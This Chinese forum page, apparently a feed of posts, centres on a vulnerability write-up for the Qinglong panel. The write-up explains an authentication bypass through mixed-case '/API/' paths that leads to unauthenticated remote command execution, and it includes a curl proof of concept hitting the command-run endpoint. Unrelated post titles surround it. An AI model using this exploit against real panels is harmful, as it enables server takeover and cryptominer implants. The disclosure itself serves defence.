服务器过期了，想买几个年付的小机子

1. 漏洞摘要
青龙面板最新版存在一处鉴权绕过漏洞，未认证请求可访问高权限接口，并最终触发命令执行。
攻击者可通过大小写变形路径（如 /API/...）绕过鉴权并命中 /api/... 实际路由。
由于 /api/system/command-run 可执行系统命令，最终形成未授权远程命令执行（RCE）。
2026年2月24日在github已有用户被植入挖矿，26日绿联从应用商店下架青龙面板。
目前社区反馈项目官方后暂无回应，建议关闭青龙面板的公网访问。
2. 漏洞分析
back/loaders/express.ts
path: [...config.apiWhiteList, /^\/(?!api\/).*/]

这里的正则匹配写的有问题，严格匹配了纯小写的api，只要不是 /api/ 开头，就会绕过 JWT 校验，自定义鉴权中间件使用的是req.path.startsWith判断，它也是严格判断纯小写，并直接放行：
if (!['/open/', '/api/'].some((x) => req.path.startsWith(x))) {
  return next();
}

所以/API/这类路径会跳过令牌校验，同时又因为Express 默认大小写不敏感，/API/... 还能匹配到 /api/... 这个路由。
app.use(config.api.prefix, routes());

最终绕过了全部鉴权，随意调用后端api，青龙面板的api中有超多可利用的点，随便找一个命令执行的接口就可以利用。
3.POC：
curl -X PUT "http://localhost:5700/aPi/system/command-run" \     
-H "Content-Type: application/json" \
-d '{"command": "id"}'

这对我一个爱看数据看着玩的人伤害很大

不得不说，谷歌这家公司的气量真不是某些A开头公司能比的

glm5好像使用了新的注意力方法，有没有佬测试过？

佬们，有没有自动可以调整Word格式的软件？